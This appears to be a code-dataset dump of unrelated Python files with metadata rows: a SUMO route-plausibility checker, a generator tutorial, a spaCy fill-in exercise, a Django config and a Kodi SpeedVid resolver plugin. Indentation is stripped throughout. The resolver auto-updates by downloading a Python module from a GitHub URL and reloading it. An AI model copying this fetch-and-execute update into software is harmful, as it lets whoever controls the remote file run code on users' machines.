if 'SUMO_HOME' in os.environ:
sys.path.append(os.path.join(os.environ['SUMO_HOME'], 'tools'))
import sumolib # noqa
from sumolib.xml import parse, parse_fast_nested # noqa
from sumolib.net import readNet # noqa
from sumolib.miscutils import Statistics, euclidean, Colorgen # noqa
from route2poly import generate_poly # noqa
else:
sys.exit("please declare environment variable 'SUMO_HOME'")
def get_options():
USAGE = "Usage %prog [options] <net.xml> <rou.xml>"
optParser = OptionParser(usage=USAGE)
optParser.add_option("-v", "--verbose", action="store_true",
default=False, help="Give more output")
optParser.add_option("--threshold", type="float", default=2.5,
help="Routes with an implausibility-score above treshold are reported")
optParser.add_option("--airdist-ratio-factor", type="float", default=1, dest="airdist_ratio_factor",
help="Implausibility factor for the ratio of routeDist/airDist ")
optParser.add_option("--detour-ratio-factor", type="float", default=1, dest="detour_ratio_factor",
help="Implausibility factor for the ratio of routeDuration/shortestDuration ")
optParser.add_option("--detour-factor", type="float", default=0.01, dest="detour_factor",
help="Implausibility factor for the absolute detour time in (routeDuration-shortestDuration)" +
" in seconds")
optParser.add_option("--min-dist", type="float", default=0, dest="min_dist",
help="Minimum shortest-path distance below which routes are implausible")
optParser.add_option("--min-air-dist", type="float", default=0, dest="min_air_dist",
help="Minimum air distance below which routes are implausible")
optParser.add_option("--standalone", action="store_true",
default=False, help="Parse stand-alone routes that are not define as child-element of " +
"a vehicle")
optParser.add_option("--blur", type="float", default=0,
help="maximum random disturbance to output polygon geometry")
optParser.add_option("--ignore-routes", dest="ignore_routes",
help="List of route IDs (one per line) that are filtered when generating polygons and " +
"command line output (they will still be added to restrictions-output)")
optParser.add_option("--restriction-output", dest="restrictions_output",
help="Write flow-restriction output suitable for passing to flowrouter.py to FILE")
optParser.add_option("--od-restrictions", action="store_true", dest="odrestrictions",
default=False, help="Write restrictions for origin-destination relations rather than " +
"whole routes")
optParser.add_option("--edge-loops", action="store_true",
default=False, help="report routes which use edges twice")
optParser.add_option("--node-loops", action="store_true",
default=False, help="report routes which use junctions twice")
optParser.add_option("--threads", default=1, type=int,
help="number of threads to use for duarouter")
optParser.add_option("--min-edges", default=2, type=int,
help="number of edges a route needs to have to be analyzed")
optParser.add_option("--heterogeneous", action="store_true",
default=False, help="Use slow parsing for route files with different formats in one file")
optParser.add_option("--reuse-routing", action="store_true",
default=False, help="do not run duarouter again if output file exists")
options, args = optParser.parse_args()
if len(args) < 2:
sys.exit(USAGE)
options.network = args[0]
options.routeFiles = args[1:]
# options for generate_poly
options.layer = 100
options.geo = False
options.internal = False
options.spread = None
return options
class RouteInfo:
def __init__(self, route):
self.edges = route.edges.split()
def calcDistAndLoops(rInfo, net, options):
if net.hasInternal:
rInfo.airDist = euclidean(
net.getEdge(rInfo.edges[0]).getShape()[0],
net.getEdge(rInfo.edges[-1]).getShape()[-1])
else:
rInfo.airDist = euclidean(
net.getEdge(rInfo.edges[0]).getFromNode().getCoord(),
net.getEdge(rInfo.edges[-1]).getToNode().getCoord())
rInfo.length = sumolib.route.getLength(net, rInfo.edges)
rInfo.airDistRatio = rInfo.length / rInfo.airDist
rInfo.edgeLoop = False
rInfo.nodeLoop = False
if options.edge_loops:
seen = set()
for e in rInfo.edges:
if e in seen:
rInfo.edgeLoop = True
rInfo.nodeLoop = True
break
seen.add(e)
if options.node_loops and not rInfo.nodeLoop:
seen = set()
for e in rInfo.edges:
t = net.getEdge(e).getToNode()
if t in seen:
rInfo.nodeLoop = True
break
seen.add(t)
def addOrSkip(routeInfos, skipped, rid, route, min_edges):
ri = RouteInfo(route)
if len(ri.edges) >= min_edges:
routeInfos[rid] = ri
else:
skipped.add(rid)
def main():
options = get_options()
if options.verbose:
print("parsing network from", options.network)
net = readNet(options.network, withInternal=True)
read = 0
routeInfos = {} # id-> RouteInfo
skipped = set()
for routeFile in options.routeFiles:
if options.verbose:
print("parsing routes from", routeFile)
idx = 0
if options.standalone:
for idx, route in enumerate(parse(routeFile, 'route')):
if options.verbose and idx > 0 and idx % 100000 == 0:
print(idx, "routes read")
addOrSkip(routeInfos, skipped, route.id, route, options.min_edges)
else:
if options.heterogeneous:
for idx, vehicle in enumerate(parse(routeFile, 'vehicle')):
if options.verbose and idx > 0 and idx % 100000 == 0:
print(idx, "vehicles read")
addOrSkip(routeInfos, skipped, vehicle.id, vehicle.route[0], options.min_edges)
else:
prev = (None, None)
for vehicle, route in parse_fast_nested(routeFile, 'vehicle', 'id', 'route', 'edges'):
if prev[0] != vehicle.id:
if options.verbose and idx > 0 and idx % 500000 == 0:
print(idx, "vehicles read")
if prev[0] is not None:
addOrSkip(routeInfos, skipped, prev[0], prev[1], options.min_edges)
prev = (vehicle.id, route)
idx += 1
if prev[0] is not None:
addOrSkip(routeInfos, skipped, prev[0], prev[1], options.min_edges)
read += idx
if options.verbose:
print(read, "routes read", len(skipped), "short routes skipped")
if options.verbose:
print("calculating air distance and checking loops")
for idx, ri in enumerate(routeInfos.values()):
if options.verbose and idx > 0 and idx % 100000 == 0:
print(idx, "routes checked")
calcDistAndLoops(ri, net, options)
prefix = os.path.commonprefix(options.routeFiles)
duarouterOutput = prefix + '.rerouted.rou.xml'
duarouterAltOutput = prefix + '.rerouted.rou.alt.xml'
if os.path.exists(duarouterAltOutput) and options.reuse_routing:
if options.verbose:
print("reusing old duarouter file", duarouterAltOutput)
else:
if options.standalone:
duarouterInput = prefix
# generate suitable input file for duarouter
duarouterInput += ".vehRoutes.xml"
with open(duarouterInput, 'w') as outf:
outf.write('<routes>\n')
for rID, rInfo in routeInfos.items():
outf.write(' <vehicle id="%s" depart="0">\n' % rID)
outf.write(' <route edges="%s"/>\n' % ' '.join(rInfo.edges))
outf.write(' </vehicle>\n')
outf.write('</routes>\n')
else:
duarouterInput = ",".join(options.routeFiles)
command = [sumolib.checkBinary('duarouter'), '-n', options.network,
'-r', duarouterInput, '-o', duarouterOutput,
'--no-step-log', '--routing-threads', str(options.threads),
'--routing-algorithm', 'astar', '--aggregate-warnings', '1']
if options.verbose:
command += ["-v"]
if options.verbose:
print("calling duarouter:", " ".join(command))
subprocess.call(command)
for vehicle in parse(duarouterAltOutput, 'vehicle'):
if vehicle.id in skipped:
continue
routeAlts = vehicle.routeDistribution[0].route
if len(routeAlts) == 1:
routeInfos[vehicle.id].detour = 0
routeInfos[vehicle.id].detourRatio = 1
routeInfos[vehicle.id].shortest_path_distance = routeInfos[vehicle.id].length
else:
oldCosts = float(routeAlts[0].cost)
newCosts = float(routeAlts[1].cost)
assert(routeAlts[0].edges.split() == routeInfos[vehicle.id].edges)
routeInfos[vehicle.id].shortest_path_distance = sumolib.route.getLength(net, routeAlts[1].edges.split())
if oldCosts <= newCosts:
routeInfos[vehicle.id].detour = 0
routeInfos[vehicle.id].detourRatio = 1
if oldCosts < newCosts:
sys.stderr.write(("Warning: fastest route for '%s' is slower than original route " +
"(old=%s, new=%s). Check vehicle types\n") % (
vehicle.id, oldCosts, newCosts))
else:
routeInfos[vehicle.id].detour = oldCosts - newCosts
routeInfos[vehicle.id].detourRatio = oldCosts / newCosts
implausible = []
allRoutesStats = Statistics("overall implausiblity")
implausibleRoutesStats = Statistics("implausiblity above threshold")
for rID in sorted(routeInfos.keys()):
ri = routeInfos[rID]
ri.implausibility = (options.airdist_ratio_factor * ri.airDistRatio +
options.detour_factor * ri.detour +
options.detour_ratio_factor * ri.detourRatio +
max(0, options.min_dist / ri.shortest_path_distance - 1) +
max(0, options.min_air_dist / ri.airDist - 1))
allRoutesStats.add(ri.implausibility, rID)
if ri.implausibility > options.threshold or ri.edgeLoop or ri.nodeLoop:
implausible.append((ri.implausibility, rID, ri))
implausibleRoutesStats.add(ri.implausibility, rID)
# generate restrictions
if options.restrictions_output is not None:
with open(options.restrictions_output, 'w') as outf:
for score, rID, ri in sorted(implausible):
edges = ri.edges
if options.odrestrictions and len(edges) > 2:
edges = [edges[0], edges[-1]]
outf.write("0 %s\n" % " ".join(edges))
if options.ignore_routes is not None:
numImplausible = len(implausible)
ignored = set([r.strip() for r in open(options.ignore_routes)])
implausible = [r for r in implausible if r not in ignored]
print("Loaded %s routes to ignore. Reducing implausible from %s to %s" % (
len(ignored), numImplausible, len(implausible)))
# generate polygons
polyOutput = prefix + '.implausible.add.xml'
colorgen = Colorgen(("random", 1, 1))
with open(polyOutput, 'w') as outf:
outf.write('<additional>\n')
for score, rID, ri in sorted(implausible):
generate_poly(options, net, rID, colorgen(), ri.edges, outf, score)
outf.write('</additional>\n')
sys.stdout.write('score\troute\t(airDistRatio, detourRatio, detour, shortestDist, airDist, edgeLoop, nodeLoop)\n')
for score, rID, ri in sorted(implausible):
# , ' '.join(ri.edges)))
sys.stdout.write('%.7f\t%s\t%s\n' % (score, rID, (ri.airDistRatio, ri.detourRatio,
ri.detour, ri.shortest_path_distance,
ri.airDist, ri.edgeLoop, ri.nodeLoop)))
print(allRoutesStats)
print(implausibleRoutesStats)
if __name__ == "__main__":
main()
| 47.315615 | 120 | 0.605393 |
935986544d7fa5f97e0ea0b354b40da1e0387ffb
| 548 |
py
|
Python
|
books/PythonCleanCode/ch7_generator/generators_iteration_1.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
books/PythonCleanCode/ch7_generator/generators_iteration_1.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
books/PythonCleanCode/ch7_generator/generators_iteration_1.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
"""Clean Code in Python - Chapter 7: Using Generators
> The Interface for Iteration
* Distinguish between iterable objects and iterators
* Create iterators
"""
class SequenceIterator:
"""
>>> si = SequenceIterator(1, 2)
>>> next(si)
1
>>> next(si)
3
>>> next(si)
5
"""
def __init__(self, start=0, step=1):
self.current = start
self.step = step
def __next__(self):
value = self.current
self.current += self.step
return value
| 19.571429 | 57 | 0.54927 |
87c953e4e28b7d3e284b81ba7e6e229224ba765d
| 406 |
py
|
Python
|
exercises/de/exc_03_09_01.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 2,085 |
2019-04-17T13:10:40.000Z
|
2022-03-30T21:51:46.000Z
|
exercises/de/exc_03_09_01.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 79 |
2019-04-18T14:42:55.000Z
|
2022-03-07T08:15:43.000Z
|
exercises/de/exc_03_09_01.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 361 |
2019-04-17T13:34:32.000Z
|
2022-03-28T04:42:45.000Z
|
from spacy.lang.de import German
from spacy.tokens import Token
nlp = German()
# Registriere die Token-Erweiterung "is_country" mit default-Wert False
____.____(____, ____=____)
# Verarbeite den Text und setze is_country auf True für den Token "Spanien"
doc = nlp("Ich wohne in Spanien.")
____ = True
# Drucke den Text und das Attribut is_country für alle Tokens
print([(____, ____) for token in doc])
| 27.066667 | 75 | 0.758621 |
3559aa09fb0b15bbb230391339a5ffef5d5e6c3a
| 95 |
py
|
Python
|
baccoapp/mysandwich/apps.py
|
msienkiewicz7/baccoapp
|
d647ca205fdf06fe57fda7b6db164ae7d3387dad
|
[
"MIT"
] | null | null | null |
baccoapp/mysandwich/apps.py
|
msienkiewicz7/baccoapp
|
d647ca205fdf06fe57fda7b6db164ae7d3387dad
|
[
"MIT"
] | null | null | null |
baccoapp/mysandwich/apps.py
|
msienkiewicz7/baccoapp
|
d647ca205fdf06fe57fda7b6db164ae7d3387dad
|
[
"MIT"
] | null | null | null |
from django.apps import AppConfig
class MysandwichConfig(AppConfig):
name = 'mysandwich'
| 15.833333 | 34 | 0.768421 |
356f93fee911c3897f7b17f23cd8b3dce5180c74
| 2,280 |
py
|
Python
|
repo/script.module.urlresolver/lib/urlresolver/plugins/speedvid.py
|
dbiesecke/dbiesecke.github.io
|
5894473591f078fd22d1cb33794c5e656ae9b8dd
|
[
"MIT"
] | 1 |
2017-11-26T18:18:46.000Z
|
2017-11-26T18:18:46.000Z
|
repo/script.module.urlresolver/lib/urlresolver/plugins/speedvid.py
|
dbiesecke/dbiesecke.github.io
|
5894473591f078fd22d1cb33794c5e656ae9b8dd
|
[
"MIT"
] | null | null | null |
repo/script.module.urlresolver/lib/urlresolver/plugins/speedvid.py
|
dbiesecke/dbiesecke.github.io
|
5894473591f078fd22d1cb33794c5e656ae9b8dd
|
[
"MIT"
] | 3 |
2019-09-30T19:52:05.000Z
|
2020-04-12T21:20:56.000Z
|
"""
OVERALL CREDIT TO:
t0mm0, Eldorado, VOINAGE, BSTRDMKR, tknorris, smokdpi, TheHighway
urlresolver XBMC Addon
Copyright (C) 2011 t0mm0
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import os, speedvid_gmu
from urlresolver import common
from urlresolver.resolver import UrlResolver, ResolverError
logger = common.log_utils.Logger.get_logger(__name__)
logger.disable()
SV_SOURCE = 'https://raw.githubusercontent.com/jsergio123/gmus/master/speedvid_gmu.py'
SV_PATH = os.path.join(common.plugins_path, 'speedvid_gmu.py')
class SpeedVidResolver(UrlResolver):
name = "SpeedVid"
domains = ['speedvid.net']
pattern = '(?://|\.)(speedvid\.net)/(?:embed-|p-)?([0-9a-zA-Z]+)'
def __init__(self):
self.net = common.Net()
def get_media_url(self, host, media_id):
try:
self._auto_update(SV_SOURCE, SV_PATH)
reload(speedvid_gmu)
web_url = self.get_url(host, media_id)
return speedvid_gmu.get_media_url(web_url, media_id)
except Exception as e:
logger.log_debug('Exception during %s resolve parse: %s' % (self.name, e))
raise
def get_url(self, host, media_id):
return self._default_get_url(host, media_id, 'http://www.{host}/embed-{media_id}.html')
@classmethod
def get_settings_xml(cls):
xml = super(cls, cls).get_settings_xml()
xml.append('<setting id="%s_auto_update" type="bool" label="Automatically update resolver" default="true"/>' % (cls.__name__))
xml.append('<setting id="%s_etag" type="text" default="" visible="false"/>' % (cls.__name__))
return xml
| 38.644068 | 134 | 0.679825 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.